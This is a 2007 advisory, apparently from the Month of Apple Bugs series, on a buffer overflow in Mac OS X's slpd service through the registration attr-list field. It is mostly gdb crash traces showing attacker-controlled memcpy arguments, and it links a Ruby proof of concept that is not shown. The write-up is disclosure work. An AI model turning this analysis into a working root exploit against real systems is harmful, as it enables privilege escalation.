Wednesday, 17 January 2007

Apple SLP Daemon Service Registration Buffer Overflow Vulnerability

Vendor:: Apple
Application:: Mac OS X
Disclosed:: 17-01-07
Description:: slpd is vulnerable to a buffer overflow condition when processing the attr-list field of a registration request, leading to an exploitable denial of service condition and potential arbitrary execution. It would allow unprivileged local (and possibly remote) users to execute arbitrary code under root privileges.
Apple introduced three new APIs that use Bonjour for service discovery. The new APIs are CFNetServices, NSNetServices and DNSServiceDiscovery. In general If your application is targeted to run on Mac OS X 10.2 and later, Apple highly recommends that you use the Bonjour APIs directly for your service discovery needs, instead of NSL.
/usr/sbin/slpd is the path to the Apple Minimal SLP v2 Service Agent, according to the RFC this type of agent is "A process working on the behalf of one or more services to advertise the services". The man page provides the following description::
The SLP daemon (Service Location Protocol) advertises local services to the network. It supports registrations from the slp_reg tool as well as NSL (Network Service Location) and the Directory Services SLP plugin.
slpd is vulnerable to a buffer overflow condition when processing the attr-list field of a registration request, leading to an exploitable denial of service condition and potential arbitrary execution. It would allow unprivileged local (and possibly remote) users to execute arbitrary code under root privileges.
Remote exploitation seems possible, although it's still being verified.
Exploit:: The provided proof of concept uses the local socket opened by slpd for sending the payload. Check the source code for more information.
$ ruby MOAB-17-01-2007.rb

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x8edd9eb1
[Switching to process 22158 thread 0x1e03]
0xffff0ac4 in ___memcpy ()
228 in /System/Library/Frameworks/System.framework/PrivateHeaders/i386/cpu_capabilities.h

(gdb) i r
eax 0xffff07a0 -63584
ecx 0xdeadbeed -559038739
edx 0x2 2
ebx 0xffffffff -1
esp 0xb02fdd70 0xb02fdd70
ebp 0xb02fdd78 0xb02fdd78
esi 0x8edd9eb1 -1898078543
edi 0x8ede19a2 -1898047070
eip 0xffff0ac4 0xffff0ac4 <___memcpy+804>
(...)

(gdb) x/12x $esp
0xb02fdd70: 0xb0305ab4 0x00000000 0xb0305ee8 0x0000b9a7
0xb02fdd80: 0xb0305ab3 0xb02fdfc3 0xdeadbeef 0xb0305ec4
0xb02fdd90: 0xb0305ebc 0xb0305eb8 0xb0305ecc 0xb0305ec8

(gdb) x/8x $ebp
0xb02fdd78: 0xb0305ee8 0x0000b9a7 0xb0305ab3 0xb02fdfc3
0xb02fdd88: 0xdeadbeef 0xb0305ec4 0xb0305ebc 0xb0305eb8


(gdb) break *0x0000b9a2
(gdb) r
(...)
(gdb) info breakpoints
Num Type Disp Enb Address What
3 breakpoint keep y 0x0000b9a2
(gdb) x/1x 0xb02fddc5+506
0xb02fdfbf: 0xdeadbeef
(gdb) x/1x 0xb02fddc5
0xb02fddc5: 0x58585858

(gdb) x/6 0xb991
0xb991: mov -32(%ebp),%eax
0xb994: mov %eax,8(%esp)
0xb998: mov -28(%ebp),%eax
0xb99b: mov %eax,4(%esp)
0xb99f: mov %ecx,(%esp)
0xb9a2: call 0x220dc

(gdb) x/1x $ebp-32
0xb0305ec8: 0xdeadbeef
(gdb) x/1x $esp+8
0xb02fdd88: 0xdeadbeef
(gdb) x/1x $ebp-28
0xb0305ecc: 0xb02fdfc3
(gdb) x/1x $esp+4
0xb02fdd84: 0xb02fdfc3
(gdb) x/1x $esp

0xb02fdd80: 0xb0305ab3
Prevention:: Wait for Apple to release a patch. Disable Personal file sharing and ensure slpd isn't running. This issue was reported to Apple on 8/2/06 5:31 PM.
Links::
MOAB-17-01-2007.rb
MOAB-17-01-2007

No comments: